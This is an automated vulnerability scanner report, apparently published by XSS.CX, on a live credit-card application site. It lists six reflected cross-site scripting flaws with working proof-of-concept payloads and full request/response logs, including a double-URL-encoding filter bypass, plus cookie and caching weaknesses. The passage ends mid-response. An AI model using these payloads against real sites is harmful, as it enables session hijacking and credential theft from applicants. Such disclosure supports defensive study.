XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, onlinecreditcenter2.com

Report generated by XSS.CX at Mon Oct 24 13:59:30 CDT 2011.



1. Cross-site scripting (reflected)

1.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp [langId parameter]

1.2. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do [RU parameter]

1.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do [RU parameter]

1.4. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp [langId parameter]

1.5. https://www.onlinecreditcenter2.com/eapplygen2/load.do [RU parameter]

1.6. https://www.onlinecreditcenter2.com/eapplygen2/load.do [RU parameter]

2. Cookie without HttpOnly flag set

2.1. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do

2.2. https://www.onlinecreditcenter2.com/eapplygen2/load.do

3. Password field with autocomplete enabled

4. Cross-domain Referer leakage

4.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

4.2. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do

4.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do

4.4. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do

4.5. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp

4.6. https://www.onlinecreditcenter2.com/eapplygen2/load.do

4.7. https://www.onlinecreditcenter2.com/eapplygen2/load.do

5. Cross-domain script include

5.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

5.2. https://www.onlinecreditcenter2.com/EApplyCommercial/footer.do

5.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do

5.4. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do

5.5. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp

5.6. https://www.onlinecreditcenter2.com/eapplygen2/load.do

6. Cacheable HTTPS response

6.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

6.2. https://www.onlinecreditcenter2.com/EApplyCommercial/footer.do

6.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do

6.4. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp

6.5. https://www.onlinecreditcenter2.com/eapplygen2/load.do

7. HTML does not specify charset

7.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

7.2. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp [langId parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

Issue detail

The value of the langId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d841a"style%3d"x%3aexpression(alert(1))"575bd441cfb was submitted in the langId parameter. This input was echoed as d841a"style="x:expression(alert(1))"575bd441cfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp?langId=end841a"style%3d"x%3aexpression(alert(1))"575bd441cfb HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c628ed5120c5e547e9472fd49253

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:27 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 405
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<html>
<head>
<link rel="stylesheet" href="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/en/css/style.css" type="text/css">
</head>
   <script language="JavaScript" SRC="https://chb.onlinecreditcenter6.com/eapplycommercial/Internet/amazoncml/end841a"style="x:expression(alert(1))"575bd441cfb/js/TermsConditions.js" height="100%">
...[SNIP]...

1.2. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do [RU parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The value of the RU request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45a46%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e1da0de562 was submitted in the RU parameter. This input was echoed as 45a46"><script>alert(1)</script>7e1da0de562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the RU request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html45a46%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e1da0de562&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3Ddefault%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_g1_apply%26ts%3D7ptf9dgqk1wgu0lo0s64fem79s2r35v%26place%3Durl%26inc%3Dpoinvsp%26pr%3Dibprox%26ad%3D0001%26plattr%3Dnone%26imp%3DA8NVK8AAPHZBS&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:24 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 10016


<!-- PR60796 Chanages start -->


<!-- PR60796 Chanages Ends -->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Cr
...[SNIP]...
<a href="https://www.amazon.com/gp/cart/view.html45a46"><script>alert(1)</script>7e1da0de562">
...[SNIP]...

1.3. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do [RU parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The value of the RU request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ed92'%3balert(1)//90191586b71 was submitted in the RU parameter. This input was echoed as 1ed92';alert(1)//90191586b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3Ddefault%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_g1_apply%26ts%3D7ptf9dgqk1wgu0lo0s64fem79s2r35v%26place%3Durl%26inc%3Dpoinvsp%26pr%3Dibprox%26ad%3D0001%26plattr%3Dnone%26imp%3DA8NVK8AAPHZBS&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:33:25 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 9986


<!-- PR60796 Chanages start -->


<!-- PR60796 Chanages Ends -->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Cr
...[SNIP]...
return;
   }
   
   
   function beginrefresh()
   {
    if (!document.images)
       {
    return;
       }
    if (parselimit==1)
    {
    var logOutUrl='https://www.amazon.com/gp/cart/view.html1ed92';alert(1)//90191586b71';
           location.href = logOutUrl ;
    }
    else
    {
    parselimit-=1;
    curmin=Math.floor(parselimit/60);
    cursec=parselimit%60;
    if (curmi
...[SNIP]...

1.4. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp [langId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/jsp/application/Internet/AgreementSummary.jsp

Issue detail

The value of the langId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e52ef"style%3d"x%3aexpression(alert(1))"97a063285e9 was submitted in the langId parameter. This input was echoed as e52ef"style="x:expression(alert(1))"97a063285e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /eapplygen2/jsp/application/Internet/AgreementSummary.jsp?langId=ene52ef"style%3d"x%3aexpression(alert(1))"97a063285e9 HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c72aa8c1bf5b6aa482b7011b28b7

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:51 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 1976
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
<script language="JavaScript" SRC="https://cha.onlinecreditcenter6.com/consumereApply/Internet/amazon/ene52ef"style="x:expression(alert(1))"97a063285e9/js/TermsConditions.js" height="100%">
...[SNIP]...

1.5. https://www.onlinecreditcenter2.com/eapplygen2/load.do [RU parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Issue detail

The value of the RU request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42dc0e4cc76 was submitted in the RU parameter. This input was echoed as fd4e9"><script>alert(1)</script>42dc0e4cc76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the RU request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.htmlfd4e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42dc0e4cc76&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3DPLCC_new_v1%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_c2_apply%26ts%3Db2a5qy6gcohj49h3hcolu9vxpmcb5ex%26place%3Dhuc%26inc%3Dplcc6%26pr%3Dconplcc%26ad%3D6MC0%26plattr%3D6MPSAC%26imp%3DA336G5NZJ23B5Q&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:51:04 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 22611


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...
<a href="https://www.amazon.com/gp/cart/view.htmlfd4e9"><script>alert(1)</script>42dc0e4cc76">
...[SNIP]...

1.6. https://www.onlinecreditcenter2.com/eapplygen2/load.do [RU parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Issue detail

The value of the RU request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a75e'%3balert(1)//b75b5387ba0 was submitted in the RU parameter. This input was echoed as 4a75e';alert(1)//b75b5387ba0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html4a75e'%3balert(1)//b75b5387ba0&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3DPLCC_new_v1%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_c2_apply%26ts%3Db2a5qy6gcohj49h3hcolu9vxpmcb5ex%26place%3Dhuc%26inc%3Dplcc6%26pr%3Dconplcc%26ad%3D6MC0%26plattr%3D6MPSAC%26imp%3DA336G5NZJ23B5Q&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:51:06 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 22581


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...

else
return;

}


function beginrefresh()
{
if (!document.images)
   {
return;
   }
if (parselimit==1)

{
var logOutUrl='https://www.amazon.com/gp/cart/view.html4a75e';alert(1)//b75b5387ba0';
       location.href = logOutUrl ;
}
else
{
parselimit-=1;
curmin=Math.floor(parselimit/60);
cursec=parselimit%60;
if (curmin!=0)
curtime=curmin
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. https://www.onlinecreditcenter2.com/EApplyCommercial/load.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/load.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html1ed92'%3balert(1)//90191586b71&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 16:09:44 GMT
X-powered-by: Servlet/2.5
Set-cookie: JSESSIONID=cf209e5ba73550128f2e147f9ff3; Path=/EApplyCommercial; Secure
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 10066


<!-- PR60796 Chanages start -->


<!-- PR60796 Chanages Ends -->


<html>
<head>
<title>Amazon.com Corporate Account Pay-in-Full Cr
...[SNIP]...

2.2. https://www.onlinecreditcenter2.com/eapplygen2/load.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html4a75e'%3balert(1)//b75b5387ba0&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.onlinecreditcenter2.com/eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html4a75e'%3balert(1)//b75b5387ba0&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 16:09:16 GMT
X-powered-by: Servlet/2.5
